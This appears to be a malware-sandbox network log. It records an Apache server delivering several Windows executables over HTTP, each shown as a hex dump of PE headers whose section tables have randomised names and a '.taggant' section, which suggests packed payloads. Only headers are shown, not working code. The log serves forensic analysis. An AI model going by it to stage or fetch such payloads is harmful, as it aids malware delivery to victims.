Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:00:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:55:17 GMTETag: "1cc400-62f9e9b507876"Accept-Ranges: bytesContent-Length: 1885184Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 c4 c6 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ac 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c ac 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 79 76 74 78 6d 75 61 00 b0 19 00 00 00 31 00 00 b0 19 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 79 79 7a 6f 6b 76 67 00 10 00 00 00 b0 4a 00 00 04 00 00 00 9e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 a2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:00:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:13:37 GMTETag: "3c3c00-62f9e064d17eb"Accept-Ranges: bytesContent-Length: 3947520Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 70 4d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 0e 25 00 00 6a 29 00 00 00 00 00 00 70 a0 00 00 10 00 00 00 50 48 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 a0 00 00 04 00 00 77 47 3c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 90 53 00 68 00 00 00 00 80 52 00 bc 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 53 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 52 00 00 10 00 00 00 ea 1f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 bc 0a 01 00 00 80 52 00 00 0c 01 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 53 00 00 02 00 00 00 06 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 31 00 00 a0 53 00 00 02 00 00 00 08 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 72 65 6b 79 72 75 6c 00 10 1b 00 00 50 85 00 00 0a 1b 00 00 0a 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 62 6d 6d 6f 64 7a 79 00 10 00 00 00 60 a0 00 00 06 00 00 00 14 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 a0 00 00 22 00 00 00 1a 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:00:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:55:17 GMTETag: "1cc400-62f9e9b507876"Accept-Ranges: bytesContent-Length: 1885184Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 c4 c6 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ac 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c ac 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 79 76 74 78 6d 75 61 00 b0 19 00 00 00 31 00 00 b0 19 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 79 79 7a 6f 6b 76 67 00 10 00 00 00 b0 4a 00 00 04 00 00 00 9e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 a2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:00:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 02 Mar 2025 15:16:11 GMTETag: "6f600-62f5d850dc4c0"Accept-Ranges: bytesContent-Length: 456192Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 35 dd 0f b0 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 46 01 00 00 08 00 00 00 00 00 00 8e 65 01 00 00 20 00 00 00 80 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 07 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 65 01 00 4b 00 00 00 00 80 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 0c 00 00 00 f8 64 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 45 01 00 00 20 00 00 00 46 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 80 01 00 00 06 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 43 53 53 00 00 00 00 00 a4 05 00 00 c0 01 00 00 a4 05 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:01:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:17:25 GMTETag: "47d000-62f9e13e65e10"Accept-Ranges: bytesContent-Length: 4706304Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 8a 6d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 d8 34 00 00 ba 39 00 00 00 00 00 00 20 c3 00 00 10 00 00 00 70 67 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 50 c3 00 00 04 00 00 e6 ec 47 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 d0 71 00 68 00 00 00 00 c0 70 00 bc 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 71 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 70 00 00 10 00 00 00 52 2b 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 bc 0a 01 00 00 c0 70 00 00 20 00 00 00 62 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 71 00 00 02 00 00 00 82 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 35 00 00 e0 71 00 00 02 00 00 00 84 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 76 72 63 71 71 63 62 00 30 1c 00 00 e0 a6 00 00 24 1c 00 00 86 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6f 6d 62 6a 73 73 6d 00 10 00 00 00 10 c3 00 00 04 00 00 00 aa 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 c3 00 00 22 00 00 00 ae 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:01:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:55:17 GMTETag: "1cc400-62f9e9b507876"Accept-Ranges: bytesContent-Length: 1885184Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 c4 c6 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ac 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c ac 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 79 76 74 78 6d 75 61 00 b0 19 00 00 00 31 00 00 b0 19 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 79 79 7a 6f 6b 76 67 00 10 00 00 00 b0 4a 00 00 04 00 00 00 9e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 a2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:01:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 19:32:46 GMTETag: "1ccc00-62f9d7435e881"Accept-Ranges: bytesContent-Length: 1887232Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 1d 1b bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 74 04 00 00 b0 00 00 00 00 00 00 00 60 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4a 00 00 04 00 00 36 f9 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 b0 05 00 6b 00 00 00 00 a0 05 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 05 00 00 10 00 00 00 9a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 a0 05 00 00 04 00 00 00 aa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 05 00 00 02 00 00 00 ae 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2a 00 00 c0 05 00 00 02 00 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 64 6b 76 71 66 67 65 00 00 1a 00 00 50 30 00 00 f2 19 00 00 b2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 65 6c 67 62 67 79 6b 00 10 00 00 00 50 4a 00 00 06 00 00 00 a4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 4a 00 00 22 00 00 00 aa 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
